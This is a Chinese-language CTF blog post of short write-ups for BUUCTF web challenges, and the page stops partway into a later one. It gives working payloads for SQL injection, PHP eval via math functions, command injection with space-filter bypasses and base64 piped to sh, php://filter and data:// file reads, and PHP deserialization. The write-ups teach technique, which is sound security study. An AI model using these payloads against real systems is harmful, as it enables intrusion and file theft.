<!DOCTYPE HTML>
<html lang="zh-CN">


<head>
    <meta charset="utf-8">
    <meta name="keywords" content="BUU-web分类整理, Web,CTF,Misc,JS,Python">
    <meta name="description" content="">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0, user-scalable=no">
    <meta name="renderer" content="webkit|ie-stand|ie-comp">
    <meta name="mobile-web-app-capable" content="yes">
    <meta name="format-detection" content="telephone=no">
    <meta name="apple-mobile-web-app-capable" content="yes">
    <meta name="apple-mobile-web-app-status-bar-style" content="black-translucent">
    <!-- Global site tag (gtag.js) - Google Analytics -->


    <title>BUU-web分类整理 | V1cuna&#39;s blog</title>
    <link rel="icon" type="image/png" href="https://cdn.jsdelivr.net/gh/V1cuna/v1cuna.github.io/V1cuna.png">

    <link rel="stylesheet" type="text/css" href="https://cdn.jsdelivr.net/gh/V1cuna/v1cuna.github.io/libs/awesome/css/all.css">
    <link rel="stylesheet" type="text/css" href="https://cdn.jsdelivr.net/gh/V1cuna/v1cuna.github.io/libs/materialize/materialize.min.css">
    <link rel="stylesheet" type="text/css" href="https://cdn.jsdelivr.net/gh/V1cuna/v1cuna.github.io/libs/aos/aos.css">
    <link rel="stylesheet" type="text/css" href="https://cdn.jsdelivr.net/gh/V1cuna/v1cuna.github.io/libs/animate/animate.min.css">
    <link rel="stylesheet" type="text/css" href="https://cdn.jsdelivr.net/gh/V1cuna/v1cuna.github.io/libs/lightGallery/css/lightgallery.min.css">
    <link rel="stylesheet" type="text/css" href="https://cdn.jsdelivr.net/gh/V1cuna/v1cuna.github.io/css/matery.css">
    <link rel="stylesheet" type="text/css" href="https://cdn.jsdelivr.net/gh/V1cuna/v1cuna.github.io/css/my.css">

    <script src="https://cdn.jsdelivr.net/gh/V1cuna/v1cuna.github.io/libs/jquery/jquery.min.js"></script>

<meta name="generator" content="Hexo 4.2.1"></head>


<body>
    <header class="navbar-fixed">
    <nav id="headNav" class="bg-color nav-transparent">
        <div id="navContainer" class="nav-wrapper container">
            <div class="brand-logo">
                <a href="/" class="waves-effect waves-light">
                    
                    <img src="https://cdn.jsdelivr.net/gh/V1cuna/v1cuna.github.io/medias/V1cuna.png" class="logo-img" alt="LOGO">
                    
                    <span class="logo-span">V1cuna&#39;s blog</span>
                </a>
            </div>
            

<a href="#" data-target="mobile-nav" class="sidenav-trigger button-collapse"><i class="fas fa-bars"></i></a>
<ul class="right nav-menu">
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/" class="waves-effect waves-light">
      
      <i class="fas fa-home" style="zoom: 0.6;"></i>
      
      <span>首页</span>
    </a>
    
  </li>
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/tags" class="waves-effect waves-light">
      
      <i class="fas fa-tags" style="zoom: 0.6;"></i>
      
      <span>标签</span>
    </a>
    
  </li>
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/archives" class="waves-effect waves-light">
      
      <i class="fas fa-archive" style="zoom: 0.6;"></i>
      
      <span>归档</span>
    </a>
    
  </li>
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/about" class="waves-effect waves-light">
      
      <i class="fas fa-user-circle" style="zoom: 0.6;"></i>
      
      <span>关于</span>
    </a>
    
  </li>
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/contact" class="waves-effect waves-light">
      
      <i class="fas fa-comments" style="zoom: 0.6;"></i>
      
      <span>留言板</span>
    </a>
    
  </li>
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/friends" class="waves-effect waves-light">
      
      <i class="fas fa-address-book" style="zoom: 0.6;"></i>
      
      <span>友情链接</span>
    </a>
    
  </li>
  
  <li>
    <a href="#searchModal" class="modal-trigger waves-effect waves-light">
      <i id="searchIcon" class="fas fa-search" title="搜索" style="zoom: 0.85;"></i>
    </a>
  </li>
</ul>


<div id="mobile-nav" class="side-nav sidenav">

    <div class="mobile-head bg-color">
        
        <img src="https://cdn.jsdelivr.net/gh/V1cuna/v1cuna.github.io/medias/V1cuna.png" class="logo-img circle responsive-img">
        
        <div class="logo-name">V1cuna&#39;s blog</div>
        <div class="logo-desc">
            
            Never really desperate, only the lost of the soul.
            
        </div>
    </div>

    

    <ul class="menu-list mobile-menu-list">
        
        <li class="m-nav-item">
	  
		<a href="/" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-home"></i>
			
			首页
		</a>
          
        </li>
        
        <li class="m-nav-item">
	  
		<a href="/tags" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-tags"></i>
			
			标签
		</a>
          
        </li>
        
        <li class="m-nav-item">
	  
		<a href="/archives" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-archive"></i>
			
			归档
		</a>
          
        </li>
        
        <li class="m-nav-item">
	  
		<a href="/about" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-user-circle"></i>
			
			关于
		</a>
          
        </li>
        
        <li class="m-nav-item">
	  
		<a href="/contact" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-comments"></i>
			
			留言板
		</a>
          
        </li>
        
        <li class="m-nav-item">
	  
		<a href="/friends" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-address-book"></i>
			
			友情链接
		</a>
          
        </li>
        
        
        <li><div class="divider"></div></li>
        <li>
            <a href="https://github.com/blinkfox/hexo-theme-matery" class="waves-effect waves-light" target="_blank">
                <i class="fab fa-github-square fa-fw"></i>Fork Me
            </a>
        </li>
        
    </ul>
</div>


        </div>

        
            <style>
    .nav-transparent .github-corner {
        display: none !important;
    }

    .github-corner {
        position: absolute;
        z-index: 10;
        top: 0;
        right: 0;
        border: 0;
        transform: scale(1.1);
    }

    .github-corner svg {
        color: #0f9d58;
        fill: #fff;
        height: 64px;
        width: 64px;
    }

    .github-corner:hover .octo-arm {
        animation: a 0.56s ease-in-out;
    }

    .github-corner .octo-arm {
        animation: none;
    }

    @keyframes a {
        0%,
        to {
            transform: rotate(0);
        }
        20%,
        60% {
            transform: rotate(-25deg);
        }
        40%,
        80% {
            transform: rotate(10deg);
        }
    }
</style>

<a href="https://github.com/blinkfox/hexo-theme-matery" class="github-corner tooltipped hide-on-med-and-down" target="_blank"
   data-tooltip="Fork Me" data-position="left" data-delay="50">
    <svg viewBox="0 0 250 250" aria-hidden="true">
        <path d="M0,0 L115,115 L130,115 L142,142 L250,250 L250,0 Z"></path>
        <path d="M128.3,109.0 C113.8,99.7 119.0,89.6 119.0,89.6 C122.0,82.7 120.5,78.6 120.5,78.6 C119.2,72.0 123.4,76.3 123.4,76.3 C127.3,80.9 125.5,87.3 125.5,87.3 C122.9,97.6 130.6,101.9 134.4,103.2"
              fill="currentColor" style="transform-origin: 130px 106px;" class="octo-arm"></path>
        <path d="M115.0,115.0 C114.9,115.1 118.7,116.5 119.8,115.4 L133.7,101.6 C136.9,99.2 139.9,98.4 142.2,98.6 C133.8,88.0 127.5,74.4 143.8,58.0 C148.5,53.4 154.0,51.2 159.7,51.0 C160.3,49.4 163.2,43.6 171.4,40.1 C171.4,40.1 176.1,42.5 178.8,56.2 C183.1,58.6 187.2,61.8 190.9,65.4 C194.5,69.0 197.7,73.2 200.1,77.6 C213.8,80.2 216.3,84.9 216.3,84.9 C212.7,93.1 206.9,96.0 205.4,96.6 C205.1,102.4 203.0,107.8 198.3,112.5 C181.9,128.9 168.3,122.5 157.7,114.1 C157.9,116.9 156.7,120.9 152.7,124.9 L141.0,136.5 C139.8,137.7 141.6,141.9 141.8,141.8 Z"
              fill="currentColor" class="octo-body"></path>
    </svg>
</a>
        
    </nav>

</header>

    



<div class="bg-cover pd-header post-cover" style="background-image: url('https://cdn.jsdelivr.net/gh/V1cuna/v1cuna.github.io/medias/featureimages/0.jpg')">
    <div class="container" style="right: 0px;left: 0px;">
        <div class="row">
            <div class="col s12 m12 l12">
                <div class="brand">
                    <h1 class="description center-align post-title">BUU-web分类整理</h1>
                </div>
            </div>
        </div>
    </div>
</div>




<main class="post-container content">

    
    <link rel="stylesheet" href="https://cdn.jsdelivr.net/gh/V1cuna/v1cuna.github.io/libs/tocbot/tocbot.css">
<style>
    #articleContent h1::before,
    #articleContent h2::before,
    #articleContent h3::before,
    #articleContent h4::before,
    #articleContent h5::before,
    #articleContent h6::before {
        display: block;
        content: " ";
        height: 100px;
        margin-top: -100px;
        visibility: hidden;
    }

    #articleContent :focus {
        outline: none;
    }

    .toc-fixed {
        position: fixed;
        top: 64px;
    }

    .toc-widget {
        width: 345px;
        padding-left: 20px;
    }

    .toc-widget .toc-title {
        margin: 35px 0 15px 0;
        padding-left: 17px;
        font-size: 1.5rem;
        font-weight: bold;
        line-height: 1.5rem;
    }

    .toc-widget ol {
        padding: 0;
        list-style: none;
    }

    #toc-content {
        height: calc(100vh - 250px);
        overflow: auto;
    }

    #toc-content ol {
        padding-left: 10px;
    }

    #toc-content ol li {
        padding-left: 10px;
    }

    #toc-content .toc-link:hover {
        color: #42b983;
        font-weight: 700;
        text-decoration: underline;
    }

    #toc-content .toc-link::before {
        background-color: transparent;
        max-height: 25px;

        position: absolute;
        right: 23.5vw;
        display: block;
    }

    #toc-content .is-active-link {
        color: #42b983;
    }

    #floating-toc-btn {
        position: fixed;
        right: 15px;
        bottom: 76px;
        padding-top: 15px;
        margin-bottom: 0;
        z-index: 998;
    }

    #floating-toc-btn .btn-floating {
        width: 48px;
        height: 48px;
    }

    #floating-toc-btn .btn-floating i {
        line-height: 48px;
        font-size: 1.4rem;
    }
</style>
<div class="row">
    <div id="main-content" class="col s12 m12 l9">
        <!-- 文章内容详情 -->
<div id="artDetail">
    <div class="card">
        <div class="card-content article-info">
            <div class="row tag-cate">
                <div class="col s7">
                    
                    <div class="article-tag">
                        
                            <a href="/tags/CTF/">
                                <span class="chip bg-color">CTF</span>
                            </a>
                        
                            <a href="/tags/WP/">
                                <span class="chip bg-color">WP</span>
                            </a>
                        
                            <a href="/tags/BUU/">
                                <span class="chip bg-color">BUU</span>
                            </a>
                        
                    </div>
                    
                </div>
                <div class="col s5 right-align">
                    
                </div>
            </div>

            <div class="post-info">
                
                <div class="post-date info-break-policy">
                    <i class="far fa-calendar-minus fa-fw"></i>发布日期:&nbsp;&nbsp;
                    2025-03-02
                </div>
                

                

                
                <div class="info-break-policy">
                    <i class="far fa-file-word fa-fw"></i>文章字数:&nbsp;&nbsp;
                    5.1k
                </div>
                

                

                
                    <div id="busuanzi_container_page_pv" class="info-break-policy">
                        <i class="far fa-eye fa-fw"></i>阅读次数:&nbsp;&nbsp;
                        <span id="busuanzi_value_page_pv"></span>
                    </div>
				
            </div>
        </div>
        <hr class="clearfix">
        <div class="card-content article-card-content">
            <div id="articleContent">
                <h1 id="PHP"><a href="#PHP" class="headerlink" title="PHP"></a>PHP</h1><h1 id="Header以及特殊技巧"><a href="#Header以及特殊技巧" class="headerlink" title="Header以及特殊技巧"></a>Header以及特殊技巧</h1><h2 id="BJDCTF-2nd-假猪套天下第一"><a href="#BJDCTF-2nd-假猪套天下第一" class="headerlink" title="[BJDCTF 2nd]假猪套天下第一"></a>[BJDCTF 2nd]假猪套天下第一</h2><p><strong>难度：易</strong></p>
<p><strong>考点：Header请求头</strong></p>
<table>
<thead>
<tr>
<th>Header</th>
<th>解释</th>
<th>示例</th>
</tr>
</thead>
<tbody><tr>
<td>Accept</td>
<td>指定客户端能够接收的内容类型</td>
<td>Accept: text/plain, text/html,application/json</td>
</tr>
<tr>
<td>Accept-Charset</td>
<td>浏览器可以接受的字符编码集。</td>
<td>Accept-Charset: iso-8859-5</td>
</tr>
<tr>
<td>Accept-Encoding</td>
<td>指定浏览器可以支持的web服务器返回内容压缩编码类型。</td>
<td>Accept-Encoding: compress, gzip</td>
</tr>
<tr>
<td>Accept-Language</td>
<td>浏览器可接受的语言</td>
<td>Accept-Language: en,zh</td>
</tr>
<tr>
<td>Accept-Ranges</td>
<td>可以请求网页实体的一个或者多个子范围字段</td>
<td>Accept-Ranges: bytes</td>
</tr>
<tr>
<td>Authorization</td>
<td>HTTP授权的授权证书</td>
<td>Authorization: Basic QWxhZGRpbjpvcGVuIHNlc2FtZQ==</td>
</tr>
<tr>
<td>Cache-Control</td>
<td>指定请求和响应遵循的缓存机制</td>
<td>Cache-Control: no-cache</td>
</tr>
<tr>
<td>Connection</td>
<td>表示是否需要持久连接。（HTTP 1.1默认进行持久连接）</td>
<td>Connection: close</td>
</tr>
<tr>
<td>Cookie</td>
<td>HTTP请求发送时，会把保存在该请求域名下的所有cookie值一起发送给web服务器。</td>
<td>Cookie: $Version=1; Skin=new;</td>
</tr>
<tr>
<td>Content-Length</td>
<td>请求的内容长度</td>
<td>Content-Length: 348</td>
</tr>
<tr>
<td>Content-Type</td>
<td>请求的与实体对应的MIME信息</td>
<td>Content-Type: application/x-www-form-urlencoded</td>
</tr>
<tr>
<td>Date</td>
<td>请求发送的日期和时间</td>
<td>Date: Tue, 15 Nov 2010 08:12:31 GMT</td>
</tr>
<tr>
<td>Expect</td>
<td>请求的特定的服务器行为</td>
<td>Expect: 100-continue</td>
</tr>
<tr>
<td>From</td>
<td>发出请求的用户的Email</td>
<td>From: <a href="mailto:user@email.com">user@email.com</a></td>
</tr>
<tr>
<td>Host</td>
<td>指定请求的服务器的域名和端口号</td>
<td>Host: <a href="http://www.zcmhi.com" target="_blank" rel="noopener">www.zcmhi.com</a></td>
</tr>
<tr>
<td>If-Match</td>
<td>只有请求内容与实体相匹配才有效</td>
<td>If-Match: “737060cd8c284d8af7ad3082f209582d”</td>
</tr>
<tr>
<td>If-Modified-Since</td>
<td>如果请求的部分在指定时间之后被修改则请求成功，未被修改则返回304代码</td>
<td>If-Modified-Since: Sat, 29 Oct 2010 19:43:31 GMT</td>
</tr>
<tr>
<td>If-None-Match</td>
<td>如果内容未改变返回304代码，参数为服务器先前发送的Etag，与服务器回应的Etag比较判断是否改变</td>
<td>If-None-Match: “737060cd8c284d8af7ad3082f209582d”</td>
</tr>
<tr>
<td>If-Range</td>
<td>如果实体未改变，服务器发送客户端丢失的部分，否则发送整个实体。参数也为Etag</td>
<td>If-Range: “737060cd8c284d8af7ad3082f209582d”</td>
</tr>
<tr>
<td>If-Unmodified-Since</td>
<td>只在实体在指定时间之后未被修改才请求成功</td>
<td>If-Unmodified-Since: Sat, 29 Oct 2010 19:43:31 GMT</td>
</tr>
<tr>
<td>Max-Forwards</td>
<td>限制信息通过代理和网关传送的时间</td>
<td>Max-Forwards: 10</td>
</tr>
<tr>
<td>Pragma</td>
<td>用来包含实现特定的指令</td>
<td>Pragma: no-cache</td>
</tr>
<tr>
<td>Proxy-Authorization</td>
<td>连接到代理的授权证书</td>
<td>Proxy-Authorization: Basic QWxhZGRpbjpvcGVuIHNlc2FtZQ==</td>
</tr>
<tr>
<td>Range</td>
<td>只请求实体的一部分，指定范围</td>
<td>Range: bytes=500-999</td>
</tr>
<tr>
<td>Referer</td>
<td>先前网页的地址，当前请求网页紧随其后,即来路</td>
<td>Referer: <a href="http://www.zcmhi.com/archives/71.html" target="_blank" rel="noopener">http://www.zcmhi.com/archives…</a></td>
</tr>
<tr>
<td>TE</td>
<td>客户端愿意接受的传输编码，并通知服务器接受接受尾加头信息</td>
<td>TE: trailers,deflate;q=0.5</td>
</tr>
<tr>
<td>Upgrade</td>
<td>向服务器指定某种传输协议以便服务器进行转换（如果支持）</td>
<td>Upgrade: HTTP/2.0, SHTTP/1.3, IRC/6.9, RTA/x11</td>
</tr>
<tr>
<td>User-Agent</td>
<td>User-Agent的内容包含发出请求的用户信息</td>
<td>User-Agent: Mozilla/5.0 (Linux; X11)</td>
</tr>
<tr>
<td>Via</td>
<td>通知中间网关或代理服务器地址，通信协议</td>
<td>Via: 1.0 fred, 1.1 nowhere.com (Apache/1.1)</td>
</tr>
<tr>
<td>Warning</td>
<td>关于消息实体的警告信息</td>
<td>Warn: 199 Miscellaneous warning</td>
</tr>
</tbody></table>
<h2 id="ASIS-2019-Unicorn-shop"><a href="#ASIS-2019-Unicorn-shop" class="headerlink" title="[ASIS 2019]Unicorn shop"></a>[ASIS 2019]Unicorn shop</h2><p><strong>难度：易</strong></p>
<p><strong>考点：unicode等价性</strong></p>
<p>一个买东西的功能，尝试买一下最贵的。</p>
<p>输入 id：4           price：1337</p>
<p>回显：Only one char(?) allowed!</p>
<p>结合题目unicorn，应该是利用了Unicode的等价性。</p>
<p>可以在这个网站上直接查询<a href="https://www.compart.com/en/unicode/U+2031" target="_blank" rel="noopener">https://www.compart.com/en/unicode/U+2031</a></p>
<p>关于Unicode的知识，详见wiki</p>
<p>[<a href="https://zh.wikipedia.org/wiki/Unicode%E7%AD%89%E5%83%B9%E6%80%A7]" target="_blank" rel="noopener">https://zh.wikipedia.org/wiki/Unicode%E7%AD%89%E5%83%B9%E6%80%A7]</a></p>
<h2 id="BJDCTF2020-Easy-MD5"><a href="#BJDCTF2020-Easy-MD5" class="headerlink" title="[BJDCTF2020]Easy MD5"></a>[BJDCTF2020]Easy MD5</h2><p><strong>难度：易</strong></p>
<p><strong>考点：md5($password,true)</strong></p>
<p>开幕只有一个输入框，啥都没有。</p>
<p>查看源码，发现注释中一个header，想起来F12查看network中的头，找到hint：</p>
<pre><code>Hint: select * from 'admin' where password=md5($pass,true)</code></pre><p>首先我们要找到一个字符串，这个字符串经过md5得到的16位原始二进制的字符串能帮我们实现sql注入。首先or这个字符串是必要的，同时为了配对原先sql语句里面有的单引号。在or的两边要有单引号，使它变成 password=‘xxx’or‘xxx’ 的形式。</p>
<p>剩余的题目就是常规的md5绕过了。</p>
<h2 id="CISCN-2019-初赛-Love-Math"><a href="#CISCN-2019-初赛-Love-Math" class="headerlink" title="[CISCN 2019 初赛]Love Math"></a>[CISCN 2019 初赛]Love Math</h2><p><strong>难度：易</strong></p>
<p><strong>考点：数学运算符构造payload</strong></p>
<p>确实已经给了学习链接：</p>
<p><a href="https://www.w3school.com.cn/php/php_ref_math.asp" target="_blank" rel="noopener">https://www.w3school.com.cn/php/php_ref_math.asp</a></p>
<p>只需要用这些数学运算符来拼凑一个可以被eval执行的payload</p>
<p>要求80个字符以内</p>
<p>我的payload是这样的：</p>
<pre><code>?c=$pi=(is_nan^(6).(4)).(tan^(1).(5));$pi=$$pi;$pi{0}($pi{1})&amp;0=system&amp;1=cat%20/flag</code></pre><p>其余的flag和分析可以看这个博客：</p>
<p><a href="https://www.cnblogs.com/20175211lyz/p/11588219.html" target="_blank" rel="noopener">https://www.cnblogs.com/20175211lyz/p/11588219.html</a></p>
<h2 id="CookieStore"><a href="#CookieStore" class="headerlink" title="CookieStore"></a>CookieStore</h2><p><strong>难度：易</strong></p>
<p><strong>知识点：简单cookie伪造</strong></p>
<p>由题名，买一下第一个，看cookie：</p>
<pre><code>eyJtb25leSI6IDQ5LCAiaGlzdG9yeSI6IFsiWXVtbXkgY2hvY29sYXRlIGNoaXAgY29va2llIl19
经过base解码：
{"money": 49, "history": ["Yummy chocolate chip cookie"]}</code></pre><p>同时注意到有一个请求主体：<code>id=0</code>，应该是说三种cookie的第一种</p>
<p>49是对应的钱数，那么我们直接改一下重发试试。</p>
<p>得到session：</p>
<pre><code>eyJtb25leSI6IDEwMCwgImhpc3RvcnkiOiBbIll1bW15IGNob2NvbGF0ZSBjaGlwIGNvb2tpZSIsICJZdW1teSBjaG9jb2xhdGUgY2hpcCBjb29raWUiLCAiWXVtbXkgY2hvY29sYXRlIGNoaXAgY29va2llIiwgIll1bW15IGNob2NvbGF0ZSBjaGlwIGNvb2tpZSIsICJmbGFnezEyNWM0ZTc0LWIwNjItNDI0MS1iYTczLTYyODc0Y2RjMjJlY31cbiJdfQ==</code></pre><p>解码得flag</p>
<h2 id="BJDCTF2020-EasySearch"><a href="#BJDCTF2020-EasySearch" class="headerlink" title="[BJDCTF2020]EasySearch"></a>[BJDCTF2020]EasySearch</h2><p><strong>难度：易</strong></p>
<p><strong>考点：swp信息泄露，SSL注入</strong></p>
<p>shtml -&gt; SSL注入</p>
<h1 id="SQL注入"><a href="#SQL注入" class="headerlink" title="SQL注入"></a>SQL注入</h1><h2 id="BJDCTF-2nd-简单注入"><a href="#BJDCTF-2nd-简单注入" class="headerlink" title="[BJDCTF 2nd]简单注入"></a>[BJDCTF 2nd]简单注入</h2><p><strong>难度：易</strong></p>
<p><strong>考点：二次注入，无列名注入bypass information_schema</strong></p>
<p>payload：</p>
<pre><code class="sql">-1'/**/union/**/select/**/1, (select/**/group_concat(a)/**/from(select/**/1,2/**/as/**/a,3/**/as/**/b/**/union/**/sele ct*from/**/users)x),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22/**/'</code></pre>
<h1 id="RCE"><a href="#RCE" class="headerlink" title="RCE"></a>RCE</h1><h2 id="GXYCTF2019-Ping-Ping-Ping"><a href="#GXYCTF2019-Ping-Ping-Ping" class="headerlink" title="[GXYCTF2019]Ping Ping Ping"></a>[GXYCTF2019]Ping Ping Ping</h2><p><strong>难度：易</strong></p>
<p><strong>考点：bypass空格RCE，反引号内联，变量覆盖</strong></p>
<p>命令注入，<code>?ip=127.0.0.1|ls</code>发现存在flag.php和index.php,cat的时候发现各种口吐芬芳，手动fuzz了一下发现ban掉了flag的贪婪匹配，bash，空格。</p>
<p>index.php里应该有源码，问题在于绕过空格过滤。</p>
<p><strong>绕过空格过滤：</strong></p>
<ul>
<li><p>[:space:]    不行，[]被过滤</p>
</li>
<li><p>cat&lt;&gt;/index  不行，/&lt;&gt;均被过滤</p>
</li>
<li><p><code>$IFS$1</code>：可以</p>
<pre><code class="shell">payload:?ip=1|cat$IFS$1index.php</code></pre>
<p><a href="https://www.jianshu.com/p/6e09a0996d9c" target="_blank" rel="noopener">关于【shell】IFS和$*变量:</a></p>
</li>
</ul>
<p>一般来说的形式有：</p>
<pre><code class="shell">cat$IFS$1/flag
cat${IFS}/flag
cat$IFS/flag</code></pre>
<p>  另外补充一下Linux中各种变量的的意思</p>
<pre><code class="shell">$# 是传给脚本的参数个数
$0 是脚本本身的名字
$1 是传递给该shell脚本的第一个参数
$2 是传递给该shell脚本的第二个参数
$@ 是传给脚本的所有参数的列表
$* 是以一个单字符串显示所有向脚本传递的参数，与位置变量不同，参数可超过9个
$$ 是脚本运行的当前进程ID号
$? 是显示最后命令的退出状态，0表示没有错误，其他表示有错误</code></pre>
<pre><code>/?ip=
|\'|\"|\\|\(|\)|\[|\]|\{|\}/", $ip, $match)){
    echo preg_match("/\&amp;|\/|\?|\*|\&lt;|[\x{00}-\x{20}]|\&gt;|\'|\"|\\|\(|\)|\[|\]|\{|\}/", $ip, $match);
    die("fxck your symbol!");
  } else if(preg_match("/ /", $ip)){
    die("fxck your space!");
  } else if(preg_match("/bash/", $ip)){
    die("fxck your bash!");
  } else if(preg_match("/.*f.*l.*a.*g.*/", $ip)){
    die("fxck your flag!");
  }
  $a = shell_exec("ping -c 4 ".$ip);
  echo "

";
  print_r($a);
}

?&gt;
</code></pre><p>看到源码，下一步是bypass 过滤的flag字符串。</p>
<p><strong>绕过flag过滤</strong></p>
<p><strong>变量覆盖</strong></p>
<p>这里注意到有一个$a可以覆盖，联想到之前拆一句话小马的做法：</p>
<pre><code class="shell">payload：?ip=127.0.0.1;a=g;cat$IFS$1fla$a.php</code></pre>
<p><strong>其他的payload：</strong></p>
<pre><code class="shell">?ip=1;echo$IFS$1Y2F0IGZsYWcucGhwCg==|base64$IFS$1-d|sh   #base64+sh（bash被过滤了）
?ip=127.0.0.1;cat$IFS$9`ls` #反引号内联执行</code></pre>
<p><strong>这里说一下反引号内联：</strong></p>
<p>命令替代，大部分<code>Unix shell</code>以及编程语言如<code>Perl</code>、<code>PHP</code>以及<code>Ruby</code>等都以成对的重音符(反引号)作指令替代，意思是以某一个指令的输出结果作为另一个指令的输入项。例如以下指令:</p>
<pre><code class="shell">echo It is now `date` 
等价于：
echo It is now 一 5月 5 05:16:04 GMT 2020
在正式执行时会产生以下输出结果：
It is now 一 5月 5 05:16:04 GMT 2020</code></pre>
<h1 id="伪协议"><a href="#伪协议" class="headerlink" title="伪协议"></a>伪协议</h1><h2 id="ACTF2020-新生赛-Include"><a href="#ACTF2020-新生赛-Include" class="headerlink" title="[ACTF2020 新生赛]Include"></a>[ACTF2020 新生赛]Include</h2><p><strong>难度：易</strong></p>
<p><strong>考点：php://filter伪协议</strong></p>
<p>点击tips发现url变成了：<code>buuoj.cn/?file=flag.php</code>，flag应该是被注释掉了。伪协议读取即可。</p>
<pre><code>?file=php://filter/convert.base64-encode/resource=flag.php</code></pre><h2 id="BSidesCF-2020-Had-a-bad-day"><a href="#BSidesCF-2020-Had-a-bad-day" class="headerlink" title="[BSidesCF 2020]Had a bad day"></a>[BSidesCF 2020]Had a bad day</h2><p><strong>难度：易</strong></p>
<p><strong>考点：伪协议</strong></p>
<p>要求是必须要有规定的字符串，我们只需要套一层就可以读取了。</p>
<pre><code>php://filter/read=convert.base64-encode/woofers/resource=flag</code></pre><h2 id="ZJCTF-2019-NiZhuanSiWei"><a href="#ZJCTF-2019-NiZhuanSiWei" class="headerlink" title="[ZJCTF 2019]NiZhuanSiWei"></a>[ZJCTF 2019]NiZhuanSiWei</h2><p>难度：易</p>
<p>考点：data&amp;filter伪协议，简单php反序列化</p>
<p>打开题目，给出源码。</p>
<pre><code class="php"> &lt;?php  
$text = $_GET["text"];
$file = $_GET["file"];
$password = $_GET["password"];
if(isset($text)&amp;&amp;(file_get_contents($text,'r')==="welcome to the zjctf")){
    echo "&lt;br&gt;&lt;h1&gt;".file_get_contents($text,'r')."&lt;/h1&gt;&lt;/br&gt;";
    if(preg_match("/flag/",$file)){
        echo "Not now!";
        exit(); 
    }else{
        include($file);  //useless.php
        $password = unserialize($password);
        echo $password;
    }
}
else{
    highlight_file(__FILE__);
}
?&gt; </code></pre>
<p><strong>第一个绕过：</strong></p>
<pre><code>if(isset($text)&amp;&amp;(file_get_contents($text,'r')==="welcome to the zjctf"))</code></pre><p>这里需要我们传入一个文件且其内容为welcome to the  zjctf，这样的话往后面看没有其他可以利用的点，我们就无法写入文件再读取，就剩下了一个data伪协议。data协议通常是用来执行PHP代码，然而我们也可以将内容写入data协议中然后让file_get_contents函数取读取。构造如下：</p>
<pre><code>text=data://text/plain;base64,d2VsY29tZSB0byB0aGUgempjdGY=</code></pre><p>当然也可以不需要base64，但是一般为了绕过某些过滤都会用到base64。data://text/plain,welcome to the zjctf</p>
<p><strong>第二个绕过</strong></p>
<pre><code>$file = $_GET["file"];
if(preg_match("/flag/",$file)){
        echo "Not now!";
        exit(); 
    }else{
        include($file);  //useless.php
        $password = unserialize($password);
        echo $password;
    }</code></pre><p>这里有file参数可控，但是无法直接读取flag，可以直接读取/etc/passwd，但针对php文件我们需要进行base64编码，否则读取不到其内容，所以以下无法使用：</p>
<pre><code>file=useless.php</code></pre><p>所以下面采用filter来读源码，但上面提到过针对php文件需要base64编码，所以使用其自带的base64过滤器。</p>
<pre><code>php://filter/read=convert.base64-encode/resource=useless.php</code></pre><p>读到的useless.php内容如下：</p>
<pre><code>&lt;?php  
class Flag{  //flag.php  
    public $file;  
    public function __tostring(){  
        if(isset($this-&gt;file)){  
            echo file_get_contents($this-&gt;file); 
            echo "&lt;br&gt;";
        return ("U R SO CLOSE !///COME ON PLZ");
        }  
    }  
}  
?&gt;</code></pre><p><strong>第三个绕过</strong></p>
<pre><code>$password = $_GET["password"];
include($file);  //useless.php
$password = unserialize($password);
echo $password;</code></pre><p>这里的file是我们可控的，所以在本地测试后有执行下面代码即可出现payload：</p>
<pre><code>&lt;?php  
class Flag{  //flag.php  
    public $file="flag.php";  
    public function __tostring(){  
        if(isset($this-&gt;file)){  
            echo file_get_contents($this-&gt;file); 
            echo "&lt;br&gt;";
        return ("U R SO CLOSE !///COME ON PLZ");
        }  
    }  
}  
$a = new Flag();
echo serialize($a);
?&gt;
//O:4:"Flag":1:{s:4:"file";s:8:"flag.php";}</code></pre><p>最后payload</p>
<pre><code>?text=data://text/plain;base64,d2VsY29tZSB0byB0aGUgempjdGY=&amp;file=useless.php&amp;password=O:4:%22Flag%22:1:%7Bs:4:%22file%22;s:8:%22flag.php%22;%7D</code></pre><h2 id="WMCTF2020-Web-Check-in-2-0"><a href="#WMCTF2020-Web-Check-in-2-0" class="headerlink" title="[WMCTF2020]Web Check in 2.0"></a>[WMCTF2020]Web Check in 2.0</h2><p>难度：易</p>
<p>考点：伪协议bypass<code>if(preg_match('/iconv|UCS|UTF|rot|quoted|base64/i',$content))</code></p>
<h2 id="WMCTF2020-Make-PHP-Great-Again"><a href="#WMCTF2020-Make-PHP-Great-Again" class="headerlink" title="[WMCTF2020]Make PHP Great Again"></a>[WMCTF2020]Make PHP Great Again</h2><p><strong>难度：中等</strong></p>
<p><strong>考点：require_once的新特性</strong></p>
<p>软连接过多造成过滤失效</p>
<p><strong>文章推荐：</strong></p>
<p><a href="https://cyc1e183.github.io/2020/04/03/%E5%85%B3%E4%BA%8Efile_put_contents%E7%9A%84%E4%B8%80%E4%BA%9B%E5%B0%8F%E6%B5%8B%E8%AF%95/" target="_blank" rel="noopener">file_put_content</a></p>
<h1 id="PHP反序列化"><a href="#PHP反序列化" class="headerlink" title="PHP反序列化"></a>PHP反序列化</h1><h2 id="网鼎杯-2020-朱雀组-phpweb"><a href="#网鼎杯-2020-朱雀组-phpweb" class="headerlink" title="[网鼎杯 2020 朱雀组]phpweb"></a>[网鼎杯 2020 朱雀组]phpweb</h2><p><strong>难度：易</strong></p>
<p><strong>考点：RCE，简单的PHP反序列化</strong></p>
<p>一直跳转，抓个包拦截一下。</p>
<p>发现会自动submit两个参：</p>
<p><img src="https://i.loli.net/2020/10/28/R2NGS3UpeCDTPW6.png" alt="2020朱雀-phpweb1.png"></p>
